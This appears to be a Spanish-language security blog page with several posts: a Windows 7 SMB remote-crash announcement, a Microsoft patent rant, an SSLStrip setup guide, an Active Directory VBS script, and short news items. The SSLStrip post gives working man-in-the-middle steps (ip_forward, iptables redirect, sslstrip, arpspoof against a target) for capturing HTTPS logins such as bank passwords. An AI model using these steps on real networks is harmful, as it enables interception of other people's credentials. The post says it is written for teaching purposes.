Windows 7 / Server 2008R2 Remote Kernel Crash

¿Recuerdan el exploit que provocaba un BSOD en Windows 7 de Laurent Gaffié?...
Si la respuesta es sí continuen leyendo, si es no, favor de ir aquí.
Pues nuestro amigo Laurent encontró otro fallo en SMB que afecta a Windows 7/ Server 2008 R2 con severidad de medium a high.
El impacto es que un atacante puede remotamente "tronar" cualquier Windows 7/Server 2008R2 dentro de la LAN o via IE (Internet Explorer).
NO hay patch por lo que se recomienda cerrar los puertos que usen SMB.
From Laurent...

"Most secure Os ever";
What ever your firewall is set to, you can get remotly smashed via IE or even via some broadcasting nbns tricks (no user interaction)
How funny.

[Blog de Laurent]

UPDATE: It works!, el PoC lo tienen que modificar un poco, una pizca de Ingenieria Social y listo!, la Windows Machine se Freezea!!! (Pwn3d!):

¿Microsoft Patenta Sudo?

DAMN!
Así empezamos es post, no soy "Microsoft hater" como algunas personas que usan Linux, yo uso ambos sistemas a diario, claro que tienen sus pros y sus contras pero al fin alcabo hacen lo que deben hacer.

Como el titulo de este post lo dice "¿Microsoft patenta sudo?", esta noticia la vi en Groklaw en donde describe una patente de Microsoft con numero 7,617,530 ingresada el 10 de noviembre de 2009 en la cual hace referencia a:

Systems and/or methods are described that enable a user to elevate his or her rights. In one embodiment, these systems and/or methods present a user interface identifying an account having a right to permit a task in response to the task being prohibited based on a user's current account not having that right.

Sistemas y/o metodos que permiten a un usuario elevar sus permisos.

O sea, NO ma#$%s...

Esta claro que estan describiendo a sudo y/o su, esto me hizo pensar en varias cuestiones, como lo mencione antes, no soy "Microsoft hater", pero en esta ocasión si se paso de ....

1.- ¿Le habra hecho daño a la comunidad que Microsoft se casara con Novell?
2.- ¿Microsoft esta "pirateandose" habilidades de GNU/Linux gracias a este "deal"?
- Will the REAL "NEW" in Windows 7 please stand up - TechRepublic
3.- ¿Seguira Microsoft ingresando patentes de sus "nuevos inventos" que saca de la comunidad de Software Libre y UNIX?
4.- ¿Algun día cobraran por x razón por aplicaciones hechas con MONO (uso, patentes, etc.)?
- Mono Tools for Visual Studio - By Icaza

Estas son algunas cuestiones que me he puesto a pensar, no tengo nada con la interoperabilidad de OSes, pero gandallearte con una patente creo que no es justo.

Let the Flame wars begin...

[GrokLaw Article]
Image by - xkcd

Graudit

Graudit es un script simple que te permite encontrar importantes fallas de seguridad en tu código.

Soporta escanear código de asp, jsp, perl, php y python.

Programmers denle una revisada.

[Sitio de Graudit]

SSL Strip

This tool provides a demonstration of the HTTPS stripping attacks presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Yeah!, un ejemplo básico es que puedes ver el username y password de una página de bancos como CapitolOne :S.

Las instrucciones siguientes seran para Fedora, ya que en la página oficial vienen para Debian based:

Python >= 2.4
yum -y install python

Python "twisted-web"
yum -y install python-twisted-web

Arpspoof
yum -y install dsniff

Setup
tar zxvf sslstrip-0.X.tar.gz
cd sslstrip-0.X
(optional) ./setup.py install

Forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward

Configuramos iptables para dirigir el tráfico HTTP a sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port [listenPort]

Ejecutamos sslstrip.
sslstrip.py -l [listenPort]

Ejecutamos arpspoof para que el tráfico sea enviado hacia nuestro equipo.
arpspoof -i [interface] -t [targetIP] [gatewayIP]

Listo, pueden abrir el archivo sslstrip.log para ver las capturas de trafico HTTPS.

Disclaimer: Este post es de cuestiones didacticas para conocer como un atacante puede aprovecharse de un acceso no autorizado a nuestra red y ver el tráfico que va destinado a HTTPS.

[Sitio de SSLStrip]

Members in Active Directory Group

Me vi en la necesidad de obtener una lista de usuarios de un grupo en AD en Win2003 Svr pero al quererlo hacer por medio de las herramientas administrativas no me daba el resultado deseado e inverti más tiempo de lo normal.

¿Qué fue lo que hice?

Tuve que recurrir al Command Prompt (Modo texto nunca se "raja").
Indagando un poco pude crear un pseudo vbs script:

On Error Resume Next

Const DOMAINGROUP = "LDAP://cn=grupo, cn=Users, dc=midominio,dc=com"
Const GROUPHEADER = "<-= GROUP grupo =->"
Const GROUPFOOTER = "====================="

doYourJob

openFile

Private Sub doYourJob()
Set objGroup = GetObject _
(DOMAINGROUP)
''objGroup.GetInfo

Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.CreateTextFile("members.txt", True)

file.Writeline GROUPHEADER

For each objMember in objGroup.Members
file.Writeline objMember.Name
Next
file.Writeline GROUPFOOTER
file.Close
End Sub

Private Sub openFile()
Const WIN_STYLE = 4
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "notepad.exe c:members.txt", WIN_STYLE
End Sub


Solo hay que hacer copy-paste y grabarlo con extensión vbs.

Saludos!

America + Chivas = 3D

Si, primera vez en la historia de la humanidad tecnologica se transmitira un partido en vivo en 3D! y los equipos a disputar dicho partido son nada mas y nada menos que las Aguilas del America y las Chivas del Guadalajara, Super Clasico, si, de nuevo, en 3D!!!!!
[Nota Periodistica]

Rapid7 adquiere Metasploit

Metasploit es el framework libre reconocido mundialmente para ejecutar exploits (hack da stuff!) que ha estado alrededor de 6 años en el ambito de la seguridad de tecnologias de información.

Este desarrollo que era solo de fin de semana o tiempo libre por parte de HD Moore y Egipt ahora sera de tiempo completo, pagado por Rapid7.

En horabuena, esperemos que Rapid7 sepa aprovechar el talento del equipo detras de Metasploit y este framework pueda crecer.

Anuncio Metasploit
Anuncio Rapid7